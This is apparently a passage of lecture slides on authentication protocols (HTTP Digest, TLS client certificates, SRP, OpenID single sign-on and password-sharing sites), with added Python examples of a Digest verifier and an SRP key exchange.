Designed login protocols

GET / HTTP/1.1
Host: www.example.com
Authorization: Digest username="jcb82", realm="www.example.com", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", cnonce="0a4f113b", nc=00000001, qop=auth, uri="/dir/index.html", response="6629fae49393a05397450978507c4ef1",

128.28.2.138 → www.example.com

$\mathrm{resp} = H\big(H(\mathrm{user}\,\|\,\mathrm{pass})\,\|\,n_{\mathrm{server}}\,\|\,\mathrm{counter}_n\,\|\,n_{\mathrm{client}}\,\|\,H(\mathrm{params})\big)$

HTTP digest access authentication Mitigates: password sniffing, database compromise
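As an added example (not code from the slides), a server-side verifier for the Digest exchange above: it parses the Authorization header, recomputes the response from a stored H(user||realm||pass) rather than the password, and rejects a replayed nonce count. The field values are the slide's; the password "nicetry" is what the Basic slide's base64 credential decodes to and is reused here for illustration.

```python
import hashlib, hmac, re

def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def parse_digest(header):
    """Parse 'Digest k="v", k=v, ...' into a dict (quoted or bare values)."""
    body = header.split(None, 1)[1]
    return {k: q or u for k, q, u in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', body)}

def ha1(username, realm, password):
    """What the server stores instead of the password: MD5(user:realm:pass)."""
    return md5hex(f"{username}:{realm}:{password}")

def digest_response(ha1_value, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response: the slide's H(H(user||pass)||n_server||counter||n_client||H(params))."""
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1_value}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")

class DigestVerifier:
    """Server side: keeps HA1 per user and rejects replayed nonce counts.  Caveat: HA1 is
    password-equivalent for Digest, so a leaked table still lets an attacker log in."""
    def __init__(self, realm):
        self.realm, self.users, self.issued = realm, {}, {}   # issued: nonce -> last nc seen
    def register(self, username, password):
        self.users[username] = ha1(username, self.realm, password)
    def issue_nonce(self, nonce):
        self.issued[nonce] = 0
    def verify(self, method, header):
        f = parse_digest(header)
        if f.get("realm") != self.realm or f.get("nonce") not in self.issued:
            return False
        if f.get("username") not in self.users or int(f["nc"], 16) <= self.issued[f["nonce"]]:
            return False                                      # unknown user, or replayed nc
        expected = digest_response(self.users[f["username"]], method, f["uri"],
                                   f["nonce"], f["nc"], f["cnonce"], f.get("qop", "auth"))
        if not hmac.compare_digest(expected, f["response"]):
            return False
        self.issued[f["nonce"]] = int(f["nc"], 16)            # only advance on success
        return True

NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"        # the server nonce shown on the slide

def client_header(password, nc="00000001"):
    """Authorization header a client sends for GET /dir/index.html with the slide's fields."""
    resp = digest_response(ha1("jcb82", "www.example.com", password), "GET",
                           "/dir/index.html", NONCE, nc, "0a4f113b")
    return (f'Digest username="jcb82", realm="www.example.com", nonce="{NONCE}", '
            f'cnonce="0a4f113b", nc={nc}, qop=auth, uri="/dir/index.html", response="{resp}"')
```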

SLIDE 118

Designed login protocols

TLS client certificates Mitigates: password sniffing, phishing, DB compromise

SLIDE 119

Designed login protocols

Public parameters: $N = 2q + 1$, $q$, $g$ with $|g| = q$, $k \in \mathbb{Z}_N$

Setup:
$C \to S : C,\ p$
$S : s \xleftarrow{R} \mathbb{Z}_N,\ x \leftarrow H(s, p),\ \text{store } C,\ v = g^{x} \pmod N$

Authentication:
$C \to S : C,\ A = g^{a} \pmod N$
$S \to C : s,\ B = k \cdot v + g^{b} \pmod N$
$C : x \leftarrow H(s, p),\ K \leftarrow H\big((B - k \cdot g^{x})^{\,a + x \cdot H(A,B)}\big)$
$S : K \leftarrow H\big((A \cdot v^{H(A,B)})^{b}\big)$

Secure Remote Password (SRP) Protocol Mitigates: password sniffing, phishing, DB compromise
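An added worked run of the SRP exchange on this slide, not code from the slides or from any SRP library: the server keeps only (s, v) and both sides derive the same K. It assumes a toy safe-prime group (N = 1019, q = 509, g = 4, constructed for the example) and SHA-256 as H; real deployments use the RFC 5054 groups, with the same arithmetic.

```python
import hashlib
import secrets

# Toy safe-prime group constructed for this example: N = 2q + 1 with q prime,
# and g = 4 is a quadratic residue, so |g| = q as the slide requires.  Real
# deployments use the RFC 5054 groups; the arithmetic below is unchanged.
N, q, g = 1019, 509, 4

def H(*parts):
    """The slide's H(.): hash any mix of integers and strings to an integer."""
    h = hashlib.sha256()
    for p in parts:
        h.update(str(p).encode() + b"|")
    return int.from_bytes(h.digest(), "big")

k = H(N, g) % N                              # public parameter k in Z_N (SRP-6a style)

def client_session(p, s, A, a, B):
    """Client: K <- H((B - k*g^x)^(a + x*H(A,B))) with x = H(s, p)."""
    x = H(s, p)
    u = H(A, B)
    g_b = (B - k * pow(g, x, N)) % N         # subtracting k*v leaves g^b
    return H(pow(g_b, a + x * u, N))

def server_session(v, A, b, B):
    """Server: K <- H((A * v^H(A,B))^b); needs only the stored verifier v."""
    u = H(A, B)
    return H(pow(A * pow(v, u, N) % N, b, N))

def run(pw_client, pw_server, s=None, a=None, b=None):
    """Setup plus one authentication; returns (K_client, K_server).
    s, a, b are drawn at random unless pinned (e.g. for a deterministic test)."""
    s = secrets.randbelow(N) if s is None else s
    v = pow(g, H(s, pw_server), N)           # setup: server stores (C, s, v), never p
    a = secrets.randbelow(q - 1) + 1 if a is None else a
    b = secrets.randbelow(q - 1) + 1 if b is None else b
    A = pow(g, a, N)                         # C -> S : C, A
    B = (k * v + pow(g, b, N)) % N           # S -> C : s, B
    return client_session(pw_client, s, A, a, B), server_session(v, A, b, B)

if __name__ == "__main__":
    kc, ks = run("nicetry", "nicetry")
    print("keys agree:", kc == ks)
    kc, ks = run("wrong", "nicetry")
    print("keys agree with a wrong password:", kc == ks)
```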

SLIDE 120

Single sign-on

SLIDE 121

Single sign-on

R   Relying party (www.example.com)
P   OpenID Provider (Facebook, Google, etc.)
UE  End user (a human)
UA  User agent (a browser)

UE → R : I'm U@P!

OpenID
Mitigates: password re-use

SLIDE 122

Single sign-on

OpenID Mitigates: password re-use

SLIDE 123

Single sign-on

UE → R : I'm U@P!
R ↔ P  : K_{R-P}, n ← D-H key exchange

OpenID
Mitigates: password re-use

SLIDE 124

Single sign-on

UE → R : I'm U@P!
R ↔ P  : K_{R-P}, n ← D-H key exchange
UE ← R : OK, go verify with P (HTTP 302)
UE → P : I want to talk to R, who you share n with

OpenID
Mitigates: password re-use

SLIDE 125

Single sign-on

UE → R : I'm U@P!
R ↔ P  : K_{R-P}, n ← D-H key exchange
UE ← R : OK, go verify with P (HTTP 302)
UE → P : I want to talk to R, who you share n with
UE ← P : Are you sure you want to talk to R?

OpenID
Mitigates: password re-use

SLIDE 126

Single sign-on

OpenID Mitigates: password re-use

SLIDE 127

Single sign-on

UE → R : I'm U@P!
R ↔ P  : K_{R-P}, n ← D-H key exchange
UE ← R : OK, go verify with P (HTTP 302)
UE → P : I want to talk to R, who you share n with
UE ← P : Sure you want to talk to R?
UE → P : Yes, here's my password: p

OpenID
Mitigates: password re-use

SLIDE 128

Single sign-on

UE → R : I'm U@P!
R ↔ P  : K_{R-P}, n ← D-H key exchange
UE ← R : OK, go verify with P (HTTP 302)
UE → P : I want to talk to R, who you share n with
UE ← P : Sure you want to talk to R?
UE → P : Yes, here's my password: p
UE ← P : Okay, use MAC_{K_{R-P}}(U, P) (HTTP 302)
UE → R : MAC_{K_{R-P}}(U, P)! See, I'm U@P

OpenID
Mitigates: password re-use

SLIDE 129

Single sign-on

UE → R : I'm U@P!
R ↔ P  : K_{R-P}, n ← D-H key exchange
UA ← R : OK, go verify with P (HTTP 302)
UA → P : I want to talk to R, here's my cookie c
UA ← P : Okay, use MAC_{K_{R-P}}(U, P)
UA → R : MAC_{K_{R-P}}(U, P)! See, I'm U@P

OpenID (auth-immediate)
Mitigates: password re-use

SLIDE 130

Avoiding password collection

www.bugmenot.com/view/nytimes.com Mitigates: password re-use across security domains, database compromise

SLIDE 131

Avoiding password collection

[Figure: Blacklisted sites from Bugmenot. Proportion of sites collecting passwords (0.0 to 1.0) against traffic rank (100 to 500); series: "Passwords collected" and "Bugmenot sharing blocked".]

SLIDE 132

Questions

jcb82@cl.cam.ac.uk
